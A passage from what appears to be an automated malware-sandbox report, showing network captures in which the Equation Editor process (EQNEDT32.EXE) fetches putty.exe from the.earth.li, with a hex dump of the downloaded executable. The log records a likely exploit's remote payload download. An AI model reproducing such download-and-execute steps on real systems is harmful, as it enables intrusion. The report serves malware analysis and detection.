Mar 22, 2022 16:50:26.363162041 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363203049 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363220930 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363230944 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363259077 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363292933 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363342047 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363419056 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363432884 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363472939 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363543034 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363595963 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363663912 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363732100 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363794088 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363852024 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.363924026 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.363981962 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364047050 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364077091 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364097118 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364120007 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364175081 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364223003 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364279032 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364343882 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364394903 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364464998 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364501953 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364556074 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364563942 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364603996 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364609003 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364649057 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.364725113 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.364761114 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.365621090 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.367165089 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.367182970 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:27.773411036 CET	49165	80	192.168.2.22	93.93.131.124

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2022 16:50:25.376482964 CET	54206	53	192.168.2.22	8.8.8.8
Mar 22, 2022 16:50:25.410243988 CET	53	54206	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 22, 2022 16:50:25.376482964 CET	192.168.2.22	8.8.8.8	0x93d0	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 22, 2022 16:50:25.410243988 CET	8.8.8.8	192.168.2.22	0x93d0	No error (0)	the.earth.li		93.93.131.124	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

the.earth.li

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	93.93.131.124	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49165	93.93.131.124	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2022 16:50:25.467176914 CET	2	OUT	GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: the.earth.li Connection: Keep-Alive
Mar 22, 2022 16:50:25.500972986 CET	3	IN	HTTP/1.1 302 Found Date: Tue, 22 Mar 2022 15:50:25 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe Content-Length: 301 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 36 2f 77 36 34 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 74 68 65 2e 65 61 72 74 68 2e 6c 69 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe">here</a>.</p><hr><address>Apache Server at the.earth.li Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	93.93.131.124	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2022-03-22 15:50:26 UTC	0	OUT	GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: the.earth.li
2022-03-22 15:50:26 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 22 Mar 2022 15:50:26 GMT Server: Apache Last-Modified: Sat, 10 Jul 2021 09:55:27 GMT ETag: "136ee8-5c6c1e34a2f22" Accept-Ranges: bytes Content-Length: 1273576 Connection: close Content-Type: application/x-msdos-program
2022-03-22 15:50:26 UTC	0	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 bb 6d e9 60 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 6a 0a 00 00 b6 08 00 00 00 00 00 40 45 08 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 13 00 00 04 00 00 7c 45 14 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdm`"j@E@\|E`
2022-03-22 15:50:26 UTC	8	IN	Data Raw: 00 f6 05 9d 07 0b 00 02 0f 85 b6 00 00 00 45 85 e4 0f 85 d8 f4 ff ff 4c 89 f1 ba 17 00 00 00 41 b0 01 e8 1f 10 00 00 bd 01 00 00 00 e9 ed fa ff ff bd 01 00 00 00 45 85 e4 0f 88 20 05 00 00 f6 05 5f 07 0b 00 02 0f 85 04 05 00 00 45 85 e4 0f 85 9a f4 ff ff 4c 89 f1 ba 22 00 00 00 45 31 c0 e8 e0 10 00 00 48 8d 15 08 43 0c 00 48 89 f9 e8 3d 0e 09 00 bd 01 00 00 00 85 c0 0f 85 cb fa ff ff eb 24 bd 01 00 00 00 45 85 e4 0f 88 ce 04 00 00 f6 05 0d 07 0b 00 02 0f 85 b2 04 00 00 45 85 e4 0f 85 48 f4 ff ff 4c 89 f1 ba 22 00 00 00 41 b8 03 00 00 00 e8 8b 10 00 00 bd 01 00 00 00 e9 88 fa ff ff 48 8d 0d 86 d5 0b 00 48 89 fa e8 75 b4 06 00 bd 01 00 00 00 e9 82 04 00 00 4d 85 ed 0f 84 63 04 00 00 bd 02 00 00 00 45 85 e4 0f 88 6b 04 00 00 f6 05 aa 06 0b 00 02 0f 85 4f 04 Data Ascii: ELAE _EL"E1HCH=$EEHL"AHHuMcEkO
2022-03-22 15:50:26 UTC	16	IN	Data Raw: 30 40 88 68 3a 48 8b 47 30 c7 40 14 04 00 00 00 48 8b 15 5a 36 0a 00 48 8d 0d dc af 0b 00 e8 81 fc 05 00 48 89 c6 48 8d 15 2f b1 0b 00 4c 89 f9 49 89 c0 e8 2f 81 00 00 48 89 f1 e8 83 d9 00 00 44 88 b4 24 bf 00 00 00 45 84 f6 4c 89 bc 24 c0 00 00 00 74 0c 4c 8d 0d 35 8b 0b 00 e9 e4 03 00 00 ba 28 00 00 00 4c 89 f9 e8 7d 83 00 00 49 89 c6 0f 11 30 0f 11 70 10 4c 89 68 20 48 8d 15 d9 b0 0b 00 4c 8d 05 9c 74 0b 00 4c 8d 0d 17 a5 0b 00 4c 89 f9 e8 99 81 00 00 48 89 c5 48 89 c1 ba 02 00 00 00 41 b8 4b 00 00 00 41 b9 19 00 00 00 e8 47 83 00 00 31 c9 e8 dd 7d 00 00 48 89 c6 31 c9 e8 d3 7d 00 00 48 89 c3 4c 8d 25 ba cf 0b 00 4c 89 e1 e8 c4 7d 00 00 48 89 74 24 38 48 89 5c 24 30 48 8d 0d 70 57 00 00 48 89 4c 24 28 48 89 44 24 20 48 8d 15 78 3c 0c 00 48 89 e9 41 b0 Data Ascii: 0@h:HG0@HZ6HHH/LI/HD$EL$tL5(L}I0pLh HLtLLHHAKAG1}H1}HL%L}Ht$8H\$0HpWHL$(HD$ Hx<HA
2022-03-22 15:50:26 UTC	23	IN	Data Raw: ff 4c 89 7c 24 68 48 89 74 24 60 48 8d 0d 89 1a 0c 00 48 89 4c 24 50 48 89 7c 24 48 b9 75 00 00 00 89 4c 24 40 48 8d 0d c5 62 0b 00 48 89 4c 24 38 48 89 6c 24 30 48 8d 0d 58 da ff ff 48 89 4c 24 28 48 89 44 24 20 c7 44 24 58 70 00 00 00 48 8d 15 0b f5 0b 00 48 89 d9 45 31 c0 41 b9 01 00 00 00 e8 c7 66 00 00 b9 97 00 00 00 e8 e8 5e 00 00 48 89 c6 48 8d 0d e4 ab 0b 00 e8 dc 5e 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 30 9c 0b 00 48 89 d9 41 b0 64 49 89 c1 e8 29 6b 00 00 b9 98 00 00 00 e8 b0 5e 00 00 48 89 c6 48 8d 0d 1e 4f 0b 00 e8 a4 5e 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 44 bc 0b 00 48 89 d9 41 b0 38 49 89 c1 e8 f1 6a 00 00 4c 8d 35 05 8a 0b 00 4c 8d 05 8f ab 0b 00 4c 89 e9 4c 89 f2 e8 37 61 00 00 4c 8d 0d b7 ac 0b 00 4c 89 e9 4c 89 f2 4c 8d Data Ascii: L\|$hHt$`HHL$PH\|$HuL$@HbHL$8Hl$0HXHL$(HD$ D$XpHHE1Af^HH^Ht$(Ld$ H0HAdI)k^HHO^Ht$(Ld$ HDHA8IjL5LLL7aLLLL
2022-03-22 15:50:26 UTC	31	IN	Data Raw: 4c 00 00 b9 1f 00 00 00 e8 0c 40 00 00 48 89 c6 48 8d 0d 64 62 0b 00 e8 00 40 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 34 e5 0b 00 48 89 f9 45 31 c0 49 89 c1 e8 4d 4c 00 00 b9 21 00 00 00 e8 d4 3f 00 00 48 89 c6 48 8d 0d bc 2a 0b 00 e8 c8 3f 00 00 48 89 74 24 40 4c 8d 35 dd be ff ff 4c 89 74 24 38 48 89 44 24 30 48 8d 05 34 94 0b 00 48 89 44 24 28 c6 44 24 20 00 48 8d 15 66 d7 0b 00 4c 8d 0d c0 1f 0c 00 48 89 f9 41 b0 6b e8 b7 4a 00 00 48 8d 35 28 c3 0b 00 4c 8d 05 88 6f 0b 00 4c 89 e9 48 89 f2 e8 3a 42 00 00 4c 8d 05 da 7e 0b 00 4c 89 e9 48 89 f2 45 31 c9 e8 f0 42 00 00 48 89 c7 b9 29 00 00 00 e8 4a 3f 00 00 48 89 c6 48 8d 1d a5 7e 0b 00 48 89 d9 e8 3b 3f 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 fe fa 0b 00 48 89 f9 41 b0 74 49 89 c1 e8 88 4b 00 Data Ascii: L@HHdb@Ht$(Ld$ H4HE1IML!?HH*?Ht$@L5Lt$8HD$0H4HD$(D$ HfLHAkJH5(LoLH:BL~LHE1BH)J?HH~H;?Ht$(Ld$ HHAtIK
2022-03-22 15:50:26 UTC	39	IN	Data Raw: b8 c0 01 00 00 e8 8f 57 08 00 48 8b 46 58 48 63 cf 44 8b 04 c8 4c 89 f1 ba 80 00 00 00 48 83 c4 28 5b 5f 5e 41 5e e9 1a 94 ff ff 90 48 83 c4 28 5b 5f 5e 41 5e c3 31 ff 39 cf 75 12 31 ff 4c 89 f1 ba 80 00 00 00 45 31 c0 e8 f7 93 ff ff 48 89 f1 48 89 da 41 89 f8 48 83 c4 28 5b 5f 5e 41 5e e9 c1 fa 05 00 41 56 56 57 55 53 48 83 ec 30 4d 89 c6 48 89 d7 48 89 cb 48 8b 05 62 d8 0c 00 48 31 e0 48 89 44 24 28 41 83 f9 02 0f 84 c1 00 00 00 45 85 c9 0f 85 9f 00 00 00 48 89 d9 48 89 fa e8 26 04 06 00 80 7b 41 00 74 5d 48 89 d9 48 89 fa e8 c8 fc 05 00 4c 8d 05 ba ed 0b 00 48 89 d9 48 89 fa e8 49 fd 05 00 48 8d 6c 24 24 48 89 e9 e8 6c 36 07 00 48 89 c6 83 7d 00 00 7e 22 31 ed 48 89 f1 89 ea e8 b4 37 07 00 48 89 d9 48 89 fa 49 89 c0 e8 19 fd 05 00 ff c5 3b 6c 24 24 7c Data Ascii: WHFXHcDLH([_^A^H([_^A^19u1LE1HHAH([_^A^AVVWUSH0MHHHbH1HD$(AEHH&{At]HHLHHIHl$$Hl6H}~"1H7HHI;l$$\|
2022-03-22 15:50:26 UTC	47	IN	Data Raw: 0f 8c 4e fe ff ff 48 c7 86 f0 00 00 00 00 00 00 00 c7 86 fc 00 00 00 00 00 00 00 e9 34 fe ff ff 45 31 f6 eb 4a 48 8b 4e 10 48 8b 01 48 8d 15 d0 34 0b 00 eb 2e 48 8b 4e 10 48 8b 01 48 8d 15 c8 03 0b 00 eb 1e 48 8b 4e 10 48 8b 01 48 8d 15 cd 30 0b 00 eb 0e 48 8b 4e 10 48 8b 01 48 8d 15 57 d6 0b 00 41 b8 40 1f 00 00 45 31 c9 ff 50 08 48 8b 8c 24 70 01 00 00 48 31 e1 e8 72 78 07 00 44 89 f0 48 81 c4 78 01 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 56 56 57 53 48 81 ec 38 02 00 00 48 89 ce 48 8b 05 f5 b8 0c 00 48 31 e0 48 89 84 24 30 02 00 00 48 8b 89 e8 00 00 00 ba 10 00 00 00 e8 68 6e ff ff 48 89 c7 48 8b 8e e8 00 00 00 ba 11 00 00 00 e8 54 6e ff ff 80 3f 00 75 09 80 38 00 0f 84 91 00 00 00 4c 8d 74 24 27 41 c7 46 f9 01 02 11 01 66 41 c7 46 fd 85 02 48 Data Ascii: NH4E1JHNHH4.HNHHHNHH0HNHHWA@E1PH$pH1rxDHx[]_^A\A]A^A_AVVWSH8HHH1H$0HhnHHTn?u8Lt$'AFfAFH
2022-03-22 15:50:26 UTC	55	IN	Data Raw: e8 e5 72 00 00 48 89 c3 41 b8 02 00 00 00 48 89 c1 48 89 c2 e8 af 70 00 00 4c 8b 06 48 89 d9 4c 89 e2 e8 4e 90 00 00 48 89 c7 48 8b 4e 08 48 89 c2 e8 a2 94 00 00 48 89 46 20 4c 89 f1 e8 4a 6d 00 00 4c 89 e1 e8 42 6d 00 00 48 89 d9 e8 3a 6d 00 00 48 89 f9 e8 32 6d 00 00 48 89 f0 48 83 c4 28 5b 5f 5e 41 5c 41 5e 41 5f c3 56 57 53 48 83 ec 20 48 89 d6 48 89 cf b9 01 00 00 00 ba 18 00 00 00 45 31 c0 e8 7f 3c 00 00 48 89 c3 48 89 78 10 0f 57 c0 0f 11 00 48 8b 4f 08 48 89 f2 e8 35 94 00 00 48 89 03 48 8b 4f 08 e8 84 93 00 00 48 89 c1 e8 33 72 00 00 48 89 43 08 48 89 d8 48 83 c4 20 5b 5f 5e c3 56 57 53 48 83 ec 20 48 89 ce 48 8b 59 10 b9 01 00 00 00 ba 18 00 00 00 45 31 c0 e8 23 3c 00 00 48 89 c7 48 89 58 10 0f 57 c0 0f 11 00 48 8b 0e e8 ef 71 00 00 48 89 07 48 Data Ascii: rHAHHpLHLNHHNHHF LJmLBmH:mH2mHH([_^A\A^A_VWSH HHE1<HHxWHOH5HHOH3rHCHH [_^VWSH HHYE1#<HHXWHqHH
2022-03-22 15:50:26 UTC	63	IN	Data Raw: 8b 4e 40 48 8b 01 48 89 f2 ff 50 10 48 89 f1 e8 2f 1e 00 00 41 83 3f 01 75 19 48 8d 0d fe cb 0b 00 48 8d 15 2b bc 0b 00 41 b8 8a 00 00 00 e8 a6 f9 07 00 49 8d 7e 10 48 89 f9 e8 aa 48 05 00 48 85 c0 74 44 48 8d 5c 24 30 48 8d 74 24 20 48 89 d9 48 89 fa e8 3d 4a 05 00 0f 10 44 24 30 0f 29 44 24 20 4c 89 f1 48 89 f2 e8 9f 00 00 00 48 8b 54 24 38 48 89 f9 e8 55 49 05 00 48 89 f9 e8 66 48 05 00 48 85 c0 75 c6 41 83 7e 50 00 7e 0e 41 83 3f 02 75 08 49 8b 0e e8 58 1c 08 00 48 8b 8c 24 78 01 00 00 48 31 e1 e8 c4 39 07 00 90 48 81 c4 80 01 00 00 5b 5f 5e 41 5e 41 5f c3 48 83 ec 48 48 8b 05 59 7a 0c 00 48 31 e0 48 89 44 24 40 88 54 24 3f 8b 41 50 85 c0 7e 1f 44 39 c0 75 1a 48 8d 44 24 3f 48 8d 54 24 28 48 89 02 48 c7 42 08 01 00 00 00 e8 13 00 00 00 48 8b 4c 24 40 Data Ascii: N@HHPH/A?uHH+AI~HHHtDH\$0Ht$ HH=JD$0)D$ LHHT$8HUIHfHHuA~P~A?uIXH$xH19H[_^A^A_HHHYzH1HD$@T$?AP~D9uHD$?HT$(HHBHL$@
2022-03-22 15:50:26 UTC	70	IN	Data Raw: 74 42 48 89 f9 4c 89 ea 45 31 c0 e8 79 fe ff ff 49 89 c4 4d 85 f6 74 3d 4d 0f af f5 4c 89 e1 4c 89 fa 4d 89 f0 e8 67 2c 07 00 4c 89 f9 4c 89 f2 e8 dc 80 06 00 4d 85 ff 74 1b 4c 89 f9 e8 37 06 08 00 eb 11 4c 89 f9 48 89 fa 4d 89 e8 e8 70 fe ff ff 49 89 c4 48 89 3b 4d 89 e7 4c 89 f8 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 cc cc 41 ba ff ff ff ff 41 b9 6a 02 00 00 4c 8d 05 8d 68 09 00 43 8d 14 0a 89 d0 c1 e8 1f 01 d0 d1 f8 48 63 d0 48 8d 14 52 41 39 0c 90 7e 05 41 89 c1 eb 0a 41 89 c2 41 39 4c 90 04 7d 12 44 89 c8 44 29 d0 83 f8 01 7f cc b8 00 00 04 00 eb 0c 41 8a 4c 90 08 b8 01 00 00 00 d3 e0 a8 78 0f 95 c0 c3 41 57 41 56 41 55 41 54 56 57 55 53 45 85 c0 0f 8e 04 02 00 00 45 89 c0 b8 10 00 00 00 45 31 d2 4c 8d 1d 49 65 09 00 be df f9 ff ff 41 b9 Data Ascii: tBHLE1yIMt=MLLMg,LLMtL7LHMpIH;MLH([]_^A\A]A^A_AAjLhCHcHRA9~AAA9L}DD)ALxAWAVAUATVWUSEEE1LIeA
2022-03-22 15:50:26 UTC	78	IN	Data Raw: ff 4d fe ff ff 4d fe ff ff 4d fe ff ff 4d fe ff ff 99 f9 ff ff a4 f9 ff ff ce ef ff ff 1f f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 2a f6 ff ff 35 f6 ff ff 01 fe ff ff 01 fe ff ff 40 f6 ff ff 4b f6 ff ff 56 f6 ff ff 61 f6 ff ff 6c f6 ff ff 77 f6 ff ff 82 f6 ff ff 8d f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 98 f6 ff ff a3 f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff ae f6 ff ff b9 f6 ff ff c4 f6 ff ff cf f6 ff ff da f6 ff ff e5 f6 ff ff f0 f6 ff ff fb f6 ff ff 06 f7 ff ff 11 f7 ff ff 1c f7 ff ff 27 f7 ff ff 01 fe Data Ascii: MMMM*5@KValw'
2022-03-22 15:50:26 UTC	86	IN	Data Raw: c9 4d 39 c8 76 0a 48 8b 41 08 4e 8b 1c c8 eb 03 45 31 db 31 c0 4c 01 d2 0f 92 c0 4c 01 da 48 83 d0 00 49 ff c1 48 c7 c2 ff ff ff ff 49 89 c2 4d 39 c1 72 cd c3 56 57 4c 8b 0a 4c 8b 11 4d 39 ca 4d 89 cb 4d 0f 47 da 45 31 c0 4d 85 db 74 32 31 c0 49 39 c2 76 0a 48 8b 71 08 48 8b 34 c6 eb 02 31 f6 49 39 c1 76 0a 48 8b 7a 08 48 8b 3c c7 eb 02 31 ff 48 31 f7 49 09 f8 48 ff c0 49 39 c3 75 d0 4c 89 c1 48 d1 e9 41 83 e0 01 31 c0 49 09 c8 0f 94 c0 5f 5e c3 4c 8b 09 45 31 c0 45 31 db 4d 39 d9 76 0a 48 8b 41 08 4e 8b 14 d8 eb 03 45 31 d2 49 31 d2 4d 09 d0 49 ff c3 ba 00 00 00 00 4d 39 cb 72 db 4c 89 c1 48 d1 e9 41 83 e0 01 31 c0 49 09 c8 0f 94 c0 c3 56 57 53 48 83 ec 40 48 89 d6 48 89 cf 48 8b 0a 48 8b 07 48 39 c8 48 0f 47 c8 48 ff c1 e8 bc ee ff ff 48 89 c3 48 8b 10 Data Ascii: M9vHANE11LLHIHIM9rVWLLM9MMGE1Mt21I9vHqH41I9vHzH<1H1IHI9uLHA1I_^LE1E1M9vHANE1I1MIM9rLHA1IVWSH@HHHHH9HGHHH
2022-03-22 15:50:26 UTC	94	IN	Data Raw: 49 8b 55 00 49 8b 4d 08 48 8b 19 83 e3 01 48 f7 db 0f 11 74 24 28 48 89 5c 24 20 4d 89 e8 4d 89 f9 e8 7f df ff ff 49 8b 16 49 8b 4e 08 0f 11 74 24 28 48 89 5c 24 20 4d 89 f0 49 89 f9 e8 63 df ff ff 41 b8 01 00 00 00 4c 89 e9 4c 89 ea e8 41 da ff ff 48 f7 dd 49 8b 16 49 8b 4e 08 0f 11 74 24 28 48 89 6c 24 20 4d 89 f0 4d 89 e9 e8 33 df ff ff 41 b8 01 00 00 00 48 89 f9 48 89 fa e8 2c e8 ff ff 48 8b 17 48 8b 4f 08 0f 11 74 24 28 48 89 6c 24 20 49 89 f8 4d 89 f9 e8 06 df ff ff 48 89 f9 4c 89 fa 41 89 f0 e8 8d d1 ff ff 4c 89 e9 4c 89 f2 41 89 f0 e8 7f d1 ff ff 8b 6c 24 58 31 f5 49 83 c4 fe 48 8b 4c 24 48 48 83 c1 ff 0f 82 d5 fe ff ff 48 8b 5c 24 60 48 8b 13 48 8b 4b 08 41 be 01 00 00 00 4c 89 74 24 30 48 c7 c6 ff ff ff ff 48 89 74 24 28 48 89 74 24 20 4c 8b 64 Data Ascii: IUIMHHt$(H\$ MMIINt$(H\$ MIcALLAHIINt$(Hl$ MM3AHH,HHOt$(Hl$ IMHLALLAl$X1IHL$HHH\$`HHKALt$0HHt$(Ht$ Ld
2022-03-22 15:50:26 UTC	102	IN	Data Raw: 5e 41 5f c3 41 57 41 56 41 54 56 57 55 53 48 83 ec 60 45 89 cf 4c 89 c0 49 89 d6 48 89 cb 8b 8c 24 c8 00 00 00 48 8b 15 b5 de 0b 00 48 31 e2 48 89 54 24 58 4c 8d 44 24 50 49 c7 00 00 00 00 00 4c 8b 4b 08 0f 57 c0 0f 11 44 24 28 89 4c 24 20 48 89 c1 44 89 fa e8 65 0d 00 00 48 89 c5 48 89 c1 e8 6d 27 06 00 48 85 c0 74 22 48 89 c1 e8 d3 a4 04 00 48 89 c7 48 89 e9 e8 25 16 06 00 48 8b 4c 24 50 e8 7b 81 ff ff e9 cf 00 00 00 4c 8b a4 24 c0 00 00 00 31 ff b9 01 00 00 00 ba 58 00 00 00 45 31 c0 e8 e0 80 ff ff 48 89 c6 48 89 78 20 48 89 78 30 48 83 c0 48 49 89 06 48 8d 46 40 48 8d 0d 93 09 09 00 48 89 4e 40 89 7e 50 48 8d 0d ad 09 09 00 48 89 4e 48 66 c7 46 18 01 01 4c 89 26 48 8b 0b 48 89 4e 08 89 7e 1c 48 8b 4b 08 48 8b 54 24 50 48 89 4c 24 40 48 89 44 24 38 40 Data Ascii: ^A_AWAVATVWUSH`ELIH$HH1HT$XLD$PILKWD$(L$ HDeHHm'Ht"HHH%HL$P{L$1XE1HHx Hx0HHIHF@HHN@~PHHNHfFL&HHN~HKHT$PHL$@HD$8@
2022-03-22 15:50:26 UTC	109	IN	Data Raw: 15 6c 36 0a 00 e9 60 01 00 00 49 8b 77 10 4d 8b b7 d8 00 00 00 49 8b 9f e0 00 00 00 48 8b 06 48 8b 78 20 48 8b 8c 24 38 02 00 00 48 31 e1 e8 be 7e 06 00 48 89 f1 4c 89 f2 49 89 d8 48 89 f8 48 81 c4 40 02 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 48 ff e0 4c 89 f9 e8 b8 03 ff ff 89 c7 85 c0 0f 85 d8 01 00 00 41 8b 87 a4 00 00 00 83 c0 fe 83 f8 04 0f 87 a6 01 00 00 48 8d 0d d9 04 00 00 48 63 04 81 48 01 c8 ff e0 49 8d 7f 78 48 89 f9 e8 d4 8c 04 00 48 83 f8 05 0f 82 9a 01 00 00 48 8d 74 24 2b 41 b8 05 00 00 00 48 89 f9 48 89 f2 e8 7a 8e 04 00 80 3e 05 0f 85 b0 02 00 00 0f be 5c 24 2c 85 db 0f 84 e0 02 00 00 48 b8 65 72 72 6f 72 3a 20 00 48 89 44 24 36 48 b8 50 72 6f 78 79 20 65 72 48 89 44 24 30 8d 43 ff 83 f8 07 0f 87 1d 03 00 00 48 8d 0d 71 04 00 00 48 63 04 Data Ascii: l6`IwMIHHx H$8H1~HLIHH@[_^A\A]A^A_HLAHHcHIxHHHt$+AHHz>\$,Herror: HD$6HProxy erHD$0CHqHc
